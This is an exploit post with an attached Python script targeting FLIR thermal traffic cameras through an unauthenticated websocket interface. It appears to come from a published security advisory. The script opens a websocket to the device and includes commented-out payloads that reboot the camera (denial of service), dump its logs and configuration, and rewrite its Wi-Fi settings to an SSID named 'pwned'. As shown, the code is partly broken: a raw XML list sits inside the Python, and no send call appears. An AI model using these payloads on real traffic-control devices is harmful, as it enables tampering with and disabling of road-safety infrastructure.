FLIR Systems FLIR Thermal Traffic Cameras Websocket Device Manipulation

FLIR Systems FLIR thermal traffic cameras suffers from a websocket device manipulation vulnerability.

MD5 | 1758b25f8d73cbe768557470cb4ec024

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# FLIR Systems FLIR Thermal Traffic Cameras Websocket Device Manipulation
# Vendor: FLIR Systems, Inc.
# Product web page:
# Affected firmware version: V1.01-0bb5b27 (TrafiOne) Codename: TrafiOne
# E1.00.09 (TI BPL2 EDGE) Codename: TIIP4EDGE
# V1.02.P01 (TI x-stream) Codename: TIIP2
# V1.05.P01 (ThermiCam) Codename: ThermiCam
# V1.04.P02 (ThermiCam) Codename: ThermiCam
# V1.04 (ThermiCam) Codename: ThermiCam
# V1.01.P02 (ThermiCam) Codename: ThermiCam
# V1.05.P03 (TrafiSense) Codename: TrafiSense
# V1.06 (VIP-IP) Codename: VIP-IP
# V1.02.P02 (TrafiRadar) Codename: TrafiRadar
# Vendor patched firmware version:
# Product name Firmware Released
# ----------------------------------------------------
# ThermiCam / TrafiSense E1.06.03 17.09.2018
# TI BPL2 EDGE V1.00 17.09.2018
# TI x-stream E1.03.02 17.09.2018
# TrafiOne E1.02.02 17.09.2018
# ----------------------------------------------------
# Summary: FLIR TrafiOne is an all-round detection sensor for traffic monitoring
# and dynamic traffic signal control. Offered in a compact and affordable
# package, the FLIR TrafiOne uses thermal imaging and Wi-Fi technology to
# adapt traffic signals based on the presence detection of vehicles, bicycles
# and pedestrians while at the same time generating high resolution data at
# intersections and in urban environments. FLIR TrafiOne helps traffic engineers
# to improve traffic flows, reduce vehicle idling time, monitor congestion,
# enhance safety for vulnerable road users, collect data and measure travel and
# delay times for different transport modes.
# FLIR TrafiCam is a vehicle presence sensor that combines a CMOS camera and a
# video detector in a single unit. FLIR TrafiCam detects moving and stationary
# vehicles at signalized intersections. Via detection outputs or via IP protocol,
# vehicle presence information is transmitted to the traffic controller so that
# signal timing can be adjusted dynamically. This way, vehicle waiting time at
# traffic lights is reduced and traffic flows are optimized.
# FLIR TrafiSense is an integrated thermal sensor and detector for vehicle and bike
# detection. TrafiSense does not need light to operate, but uses the thermal energy
# emitted from vehicles and bicyclists. This enables the sensor to detect vehicles
# and bikes in the darkest of nights, over a long range and in the most difficult
# weather conditions. The result is reliable, 24/7 traffic detection for a wide
# range of applications.
# FLIR TrafiRadar vehicle presence sensor is a combination of a video sensor and
# radar. TrafiRadar is typically used for stop bar and advance vehicle presence
# detection, traffic adaptive systems, and dilemma-zone protection and thus improves
# traffic safety and efficiency at signalized intersections. TrafiRadar will warn
# traffic light controllers whenever a vehicle is present in the dilemma zone, either
# extending green or red lights to improve overall safety.and stationary vehicles at
# signalized intersections and collect traffic data at intersections or interurban
# roads. Via detection outputs or via IP protocol, vehicle presence information is
# transmitted to the traffic controller so that signal timing can be adjusted
# dynamically. TrafiCam x-stream offers streaming video at full frame rate, to be
# used for traffic monitoring in a control room.
# The VIP series offers multi-functional Video Image Processing modules for traffic
# control. VIP boards integrate automatic incident detection, data collection,
# recording of pre and post incident image sequences and streaming video in one
# board. VIP modules have been installed for road and tunnel projects all over the
# world.
# Desc: FLIR thermal traffic cameras suffer from an unauthenticated device manipulation
# vulnerability utilizing the websocket protocol. The affected FLIR Intelligent
# Transportation Systems - ITS models use an insecure implementation of websocket
# communication used for administering the device. Authentication and authorization
# bypass via referencing a direct object allows an attacker to directly modify running
# configurations, disclose information or initiate a denial of service (DoS) scenario
# with Reboot command. The devices do not support the usage of TLS 'wss://' prefix for
# WebSocket Secure connection making the network traffic disclosed in plain-text to
# MitM evil-doers. Also, the web service has an Origin validation security issue and
# is vulnerable to Cross-Site WebSocket Hijacking (CSWSH).
# ---
# Request:
# GET ws:// HTTP/1.1
# Host:
# Connection: Upgrade
# Pragma: no-cache
# Cache-Control: no-cache
# User-Agent: Bond/00.7
# Upgrade: websocket
# Origin:
# Sec-WebSocket-Version: 13
# Accept-Encoding: gzip, deflate
# Accept-Language: en-US,en;q=0.9
# Cookie: tmhDynamicLocale.locale=%22en%22
# Sec-WebSocket-Key: A5SH9PRtc3rYF49kKO4vmw==
# Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
# Response:
# HTTP/1.1 101 Switching Protocols
# Server: nginx/1.10.2
# Date: Mon, 13 Aug 2018 02:48:46 GMT
# Content-Length: 0
# Connection: upgrade
# Upgrade: WebSocket
# Sec-WebSocket-Accept: QyXaTdjpCsAyxhVnVqjMg95jepk=
# ---
# No HTTP/1.1 401 Unauthorized response observed.
# Tested on: nginx/1.12.1
# nginx/1.10.2
# nginx/1.8.0
# Websocket/13 (RFC 6455)
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab -
# Advisory ID: ZSL-2018-5490
# Advisory URL:
# Vendor firmware updates:
# Vendor cyber hardening guide:
# 26.07.2018

from websocket import create_connection as t00t
import time
import sys

endpoint = "/ws/xml2"

if (len(sys.argv) <= 2):
print '[*] Usage: <ipaddress> <port>'

host = sys.argv[1]
port = sys.argv[2]

# Supported message types:
<Message Type="SupportedMessages">
<Message Type="GetMessageConstraints"/>
<Message Type="GetSupportedMessages"/>
<Message Type="Session"/>
<Message Type="Subscription"/>
<Message Type="ClearData"/>
<Message Type="GetConnectionInformation"/>
<Message Type="GetData"/>
<Message Type="GetEvents"/>
<Message Type="GetLostData"/>
<Message Type="GetManagedBy"/>
<Message Type="GetPresenceData"/>
<Message Type="GetPresenceLevel"/>
<Message Type="GetPresenceLevelHistory"/>
<Message Type="GetStorageLimits"/>
<Message Type="SetConnectionSettings"/>
<Message Type="SetManagedBy"/>
<Message Type="ClearBootCount"/>
<Message Type="ClearHistogram"/>
<Message Type="ClearStoredCounter"/>
<Message Type="ClearSystemLogs"/>
<Message Type="CreateAviSequence"/>
<Message Type="DoBadStuff"/> <-- ;]]
<Message Type="ForceEvent"/>
<Message Type="ForceKeyframe"/>
<Message Type="GetBootCount"/>
<Message Type="GetBplSettings"/>
<Message Type="GetCameraConfiguration"/>
<Message Type="GetCameraDefinitions"/>
<Message Type="GetCameraSettings"/>
<Message Type="GetConfiguration"/>
<Message Type="GetConstraints"/>
<Message Type="GetCpuStatistics"/>
<Message Type="GetDateTime"/>
<Message Type="GetDisplayOverlay"/>
<Message Type="GetEventLog"/>
<Message Type="GetEventsDescription"/>
<Message Type="GetFrameFlow"/>
<Message Type="GetHardwareInformation"/>
<Message Type="GetHardwareSensors"/>
<Message Type="GetHistogram"/>
<Message Type="GetImage"/>
<Message Type="GetImageSharpness"/>
<Message Type="GetLeptonSettings"/>
<Message Type="GetLoggingActivation"/>
<Message Type="GetMemoryStatistics"/>
<Message Type="GetNumberOfOutputs"/>
<Message Type="GetOpenEvents"/>
<Message Type="GetOutputsState"/>
<Message Type="GetPermissions"/>
<Message Type="GetProductInformation"/>
<Message Type="GetSocketInformation"/>
<Message Type="GetState"/>
<Message Type="GetStoredCounter"/>
<Message Type="GetSystemLogs"/>
<Message Type="GetTemperature"/>
<Message Type="GetThermalQualityHistogram"/>
<Message Type="GetThermalQualityReferenceImage"/>
<Message Type="GetThreadInformation"/>
<Message Type="GetTime"/>
<Message Type="GetTranslations"/>
<Message Type="GetUpTime"/>
<Message Type="GetVersion"/>
<Message Type="GetVoltage"/>
<Message Type="GetWifiInformation"/>
<Message Type="KeepAlive"/>
<Message Type="Notify"/>
<Message Type="PauseDetectionFramework"/>
<Message Type="Reboot"/>
<Message Type="SetBplSettings"/>
<Message Type="SetCameraConfiguration"/>
<Message Type="SetCameraSettings"/>
<Message Type="SetConfiguration"/>
<Message Type="SetConstraintsFilter"/>
<Message Type="SetDateTime"/>
<Message Type="SetDisplayOverlay"/>
<Message Type="SetHardwareInformation"/>
<Message Type="SetLeptonSettings"/>
<Message Type="SetLoggingActivation"/>
<Message Type="SetTime"/>
<Message Type="SetWifiInformation"/>
<Message Type="UpdateFrameFlow"/>

socket = t00t("ws://"+host+":"+port+endpoint)

#print 'Sending Reboot message type (DoS)...'
#msg = '<Message Type=\"Reboot\"></Message>'
#print 'Getting supported messages...'
#msg = '<Message Type=\"GetSupportedMessages\"></Message>'
#print 'Getting system logs...'
#msg = '<Message Type=\"GetSystemLogs\"></Message>'
#print 'Getting device configuration...'
#msg = '<Message Type=\"GetConfiguration\"></Message>'
#print 'Setting new Wifi information...'
#msg ='''
#<Message Type="SetWifiInformation">
# <Body Present="0" SSID="pwned" Channel="11" Hidden="0" Mode="AccessPoint" />

msg = '<Message Type=\"GetProductInformation\"></Message>'

print 'Message sent.'
print 'Receiving...'
priem = socket.recv()
print 'Received data: \n%s' % priem

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